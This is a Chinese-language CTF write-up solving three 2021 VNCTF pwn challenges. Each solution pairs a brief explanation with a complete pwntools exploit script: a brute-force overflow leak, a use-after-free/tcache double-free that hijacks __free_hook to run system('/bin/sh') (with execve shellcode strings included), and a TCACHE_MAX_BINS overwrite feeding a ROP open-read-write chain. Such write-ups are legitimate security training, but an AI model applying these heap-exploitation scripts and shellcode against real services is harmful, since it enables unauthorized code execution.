[复现]2021VNCTF-pwn

hh这个vmpwn就不做了叭，好麻烦

White_Give_Flag

这里是申请了一个随机大小的堆块

​

先是把flag读进heap里面，然后free掉，进入程序看发现

进入菜单之前，flag在top heap中，只要申请就会出似乎

​

不过，随机的

​

在这里会有一个数组溢出，但是只能溢出1

​

溢出的地方正巧是heap指针的最后一个

那么就是利用这个puts输出，由于是随机的，所以我们只能爆破，就假定是0x310的堆块，最终还是会申请出来的，

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
p = process('./1')
#elf = ELF('./1')

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():
	gdb.attach(p)
	pause()

def menu(choice):
	sla('choice:',choice)

def add(size):
	menu('')
	sla('size:\n',size)

def edit(index,data):
	menu('111')
	sla('index:\n',index)
	p.sendafter('Content:\n',data)

def delete(index):
	menu('11')
	sla('index:\n',index)

def show(index):
	menu('1')

#debug()


while True:
    p = process('./1')
    add(0x10)
    add(0x10)
    add(0x10)
    add(0x310)
    edit(3,'a'*0x10)
    p.recvuntil('choice:')
    p.shutdown_raw('send')
    flag = p.recvline()
    print(flag)
    if b'{' in flag or b'}' in flag:
        exit(0)
    p.close()

p.interactive()

​

ff

存在一个uaf，free没有清空指针，仅有一次show

利用这一次show泄露指针异或的key

然后利用tcachebin的df来讲tcache struct free掉，利用fd上残余的libc地址爆破stdout地址泄露libc

然后继续利用double free打__free_hook来提权

#encoding = utf-8
import os
import sys
import time
from pwn import *
from ctypes import *
#from LibcSearcher import * 

context.os = 'linux'
context.log_level = "debug"

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))


armmips = 0
x64_32 = 1

if(len(sys.argv) == 4):
	binary = sys.argv[1]
	libcelf = sys.argv[2]
	ldfile = sys.argv[3]
elif(len(sys.argv) == 3):
	ip = sys.argv[1]
	port = sys.argv[2]

if x64_32:
	context.arch = 'amd64'
else:
	context.arch = 'i386'

if armmips==0:
	if(len(sys.argv) == 4):
		if ldfile:
			p = process([ldfile, binary], env={"LD_PRELOAD":libcelf})
			libc = ELF(libcelf)
			elf = ELF(binary)
		elif libcelf:
			p = process([binary], env={"LD_PRELOAD":libcelf})
			libc = ELF(libcelf)
			elf = ELF(binary)
		else:
			p = process(binary)
	else:
		p = remote(ip,port)
else:
	if(len(sys.argv) == 4):
		if x64_32:
			p = process(["qemu-arm", "-g", "1212", "-L", "/usr/arm-linux-gnueabi",binary])
		else:
			p = process(["qemu-aarch64", "-g", "1212", "-L", "/usr/aarch64-linux-gnu/", binary])
	else:
		p = remote(ip,port)

libcc = cdll.LoadLibrary(libcelf)

sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"

def debug():
	gdb.attach(p)
	pause()

def add(size,con):
	sla('>>','1')
	sla('Size:',size)
	p.sendafter('Content:',con)
  
def add(size,con):
	p.sendlineafter(">>","1")
	p.sendlineafter(":",str(size))
	p.sendafter(":",con)
  
def delete():
	p.sendlineafter(">>","2")
  
def show():
	p.sendlineafter(">>","3")
  
def edit(con):
	p.sendlineafter(">>","5")
	p.sendafter(":",con)

def pwn():
	add(0x60,'1')
	delete()
	show()
	key = uu64(r(5))
	leak('key',key)
	heapbase = key*0x1000
	leak('heapbase',heapbase)

	edit(b'\x00'*0x10)
	delete()
	edit(2*p64(key^(heapbase+0x10)))
	add(0x60,'aaa')
	add(0x60,'\x00'*0x4e + '\x07')
	delete()
	add(0x48,'\x00'*6+'\x01'+'\x00'*0x5+'\x01'+'\x00'*8)
	add(0x38,"\x00"*0x10)
	add(0x10,'\x00'*8+'\xc0\x56')
	add(0x40,p64(0xfbad1800) + b'\x00'*0x18 + b'\x00')
	libcbase = uu64((ru('\x7f')[-5:]+b'\x7f')) - 0x1E1744
	leak('libcbase',libcbase)

	free_hook = libcbase + libc.sym['__free_hook']
	system = libcbase + libc.sym['system']
	add(0x30,p64(free_hook))
	add(0x70,p64(system))
	add(0x30,'/bin/sh\x00')
	delete()
	#
	#debug()
	itr()

if __name__ == '__main__':
	pwn()


'''
i = 0
while 1:
	i += 1
	log.warn(str(i))
	try:  
		pwn()
	except Exception:
		p.close()
		if(local == 1):
			p = process(binary)
		else:
			p = remote(ip,port)
		continue
'''

​

LittleRedFlower

程序给出了一次任意地址写，然后还给了一次申请堆块的机会利用之后free掉。

利用任意地址写将TCACHE_MAX_BINS控制成无限大，这样的话开头的tcache管理堆块就会显得异常的大，写入到下面的地址就会被利用为相应大小的tcachebin的第一个堆块

我们只需要申请到free_hook上面劫持为svcudp_reply+26，进行栈迁移然后orw即可

from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
p = process('./pwn')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
elf = ELF('./pwn')

s       = lambda data               :p.send(str(data))
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda num                :p.recv(num)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
itr     = lambda                    :p.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():
	gdb.attach(p)
	pause()

ru('0x')
libcbase = int(r(12),16) - libc.sym["_IO_2_1_stdout_"]
leak('libcbase',libcbase)
p_rdi = libcbase + 0x0000000000023b6a
p_rdx = libcbase + 0x0000000000142c92
p_rsi = libcbase + 0x000000000002601f
free_hook = libcbase + libc.sym['__free_hook']
puts = libcbase + libc.sym['puts']
read = libcbase + libc.sym['read']
opent = libcbase + libc.sym['open']
tcache_bins = libcbase + 0x1EC2D0
ogg = libcbase + 0x154DEA

p.sendafter('You can write a byte anywhere\n',p64(tcache_bins+0x7))
p.sendafter('And what?\n','\xff')
sla('Offset:',0x9e8)
p.sendafter('Content:',p64(free_hook-0xa0))
sla("size:",0x1800)

pl = p64(libcbase+0x00000000000578c8) + p64(libcbase+0x0000000000023b67)+ p64(0) + p64(free_hook-0xc8)
pl += p64(p_rdi) + p64(free_hook -0xa0 + 0x38) + p64(libcbase + 0x00000000000ef194) + b'./flag\x00\x00' + p64(0) + p64(free_hook - 0xa0)
pl += p64(p_rsi) + p64(0) + p64(p_rdx) + p64(0) + p64(opent)
pl += p64(p_rdi) + p64(3) + p64(p_rsi) + p64(free_hook-0x100) + p64(libcbase + 0x0000000002f709) + p64(ogg) + p64(p_rdx) + p64(0x30) + p64(read)
pl += p64(p_rdi) + p64(free_hook-0x100) + p64(puts)
#debug()
p.sendafter('>>',pl)

p.interactive()

​